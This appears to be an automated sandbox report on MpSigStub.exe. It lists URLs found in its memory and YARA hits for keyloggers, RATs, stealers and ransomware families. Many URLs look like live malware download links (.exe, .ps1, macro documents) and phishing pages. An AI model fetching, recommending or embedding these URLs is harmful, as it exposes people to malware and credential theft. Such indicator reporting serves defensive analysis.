Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://www.ccleaner.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://www.divera.nl/wp-content/themes/flexfit/framework/css/font/gr
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.escrowprotects.com/share
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.exploit-db.com/exploits/39719/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://www.fabianiarte.com/uploads/imgup/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: https://www.fastsupport.com
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp String found in binary or memory: https://www.fastsupport.com/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: https://www.finance-portal.basf.net/portal
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://www.flexdirect.adp.com/client/login.aspx
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: https://www.formtools.com/f/micr0soft0ffice365mail
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.fotoideaymedia.es/wp-content/themes/fotoideaymedia2017/css/reset.css
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://www.freecontent.bid./cpcu.js
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/j/collect.
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com.tr/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://www.gottalife.net/wp-content/plugins/seo_index/evt8tkbsidbqf.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://www.gqtoronto.com/live/excelzz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: https://www.hashing.win/scripts/min.js
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: https://www.hashing.win/t5s0.js
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://www.horizon-sun.com/po/mailbox/rectify/sys-admin-9-0-4-7/repair-00-4/1159.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: https://www.icq.com/people/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://www.ijsiodjfo.ml/index.php?user=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://www.kbtseafood.com/wp-content/uploads/2019/07/JTGUJRDPX.res
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://www.listrikindo.com/templates/vinye/wp-content/themes/jamo/order1.doc
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: https://www.llotytue.gq/index.php?user=
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://www.luongynhiem.com/wp-content/themes/sahifa/js/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://www.maan2u.com/alls.txt
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://www.managuytakayama.com/purchases
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://www.marriott.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: https://www.miracleworkstudios.com/wp-content/uploads/2019/12/app/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://www.monconcept-renovation.fr/wp-admin/network/msci.exe
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://www.moverandpackermvp.com/hindustan/scan/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.nachhilfe-unterricht.com/wp-content/cache/autoptimize/css/autoptimize_018281502668e27604
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://www.nathiagali.com/wp-includes/phpmailer/fmupdates/next.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://www.nathiagali.com/wp-includes/pomo/s2/danielmccarthy.php
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: https://www.ne-ba.org/files/gallery/images/bae_ecs_epm.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://www.nextrecruitment.ro//pdd/sfexpress/index.php?email=hiroyuki.ume.zh
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://www.notion.so/ce3baa2cd5ec4f4eab00575f5ae423e8
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://www.objectiveline.com/tt-onedrive/sugar.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://www.palmtipsheet.com/wp-content/calc1.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.pamelamann.co.za/1/shola/doc/purchase.doc
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: https://www.paypal.com
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://www.piriform.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.pmc-services.de
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://www.protectalaskasfuture.com/wp-content/upgrade/new.php
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://www.realvnc.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: https://www.slgroupsrl.com/vendo
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://www.spectrumhosting.co.za/hello-3.wav
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://www.sugarsync.com/pf
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://www.tamim.pro/wp-content/themes/beonepage-pro/languages/msg.j
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: https://www.teamviewer.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.tecel.cl/.well-known/frank/next.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://www.tecel.cl/content/ak/next.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://www.thegoodplan.ovh/promo.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://www.torproject.org/download/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://www.tsuburaya-prod.co.jp/wp-content/plugins/wp-ogp/sa.exe
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://www.ultimateislandguide.com//cache/.p/next.php
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.upload.ee/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://www.upload.ee/download/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://www.vacsax.co.uk/wp-admin/mile/graceserver.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://www.vespang.cf/ideshow/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://www.vespang.cf/ideshow/post.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.yaplakal.com/go/?https://yothuful-lichretman-bboae1.netlify.app#juangondo
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://www.zimsgizmos.biz/wp-content/themes/zgf/images/headers/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp String found in binary or memory: https://www2.bancobrasil.com.br/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://xf.zp-inwsice.online/?e=claire
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://xmr-services.tk/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: https://xtronbikewear.co.uk/gt/dhl_topscript/source/index.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://xw.kh-imoice.online/?e=info
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: https://y/ews/Exchange.asmx
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://yerl.org/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://ygmservices.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://yoga.webnatico.com/wp-admin/maint/msci.exe
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://youc1000.com/f.html#/ywxsaxnvbi5ly2tszxlay3nnas5jb20=
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://zk.fx-invoice.online/?e=info
Source: unknown DNS traffic detected: queries for: spclient.wg.spotify.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: :127.0.0.1 www.login.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: <127.0.0.1 www.search.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: www.hotmail.com equals www.hotmail.com (Hotmail)
Source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected LaZagne password dumper
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Linux EvilGnome RC5 key
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected VBKeyloggerGeneric
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Creates a DirectInput object (often for capturing keystrokes)
Source: WerFault.exe, 00000005.00000003.2855746195.000000000294D000.00000004.00000001.sdmp Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
Installs a raw input device (often for capturing keystrokes)
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud:

barindex
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected LazParking Ransomware
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BlackMoon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Zeppelin Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Ragnarok ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Apis Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Wannacry ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MegaCortex Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cobra Locker ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected RekenSom ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Avaddon Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Babuk Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Nemty Ransomware
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
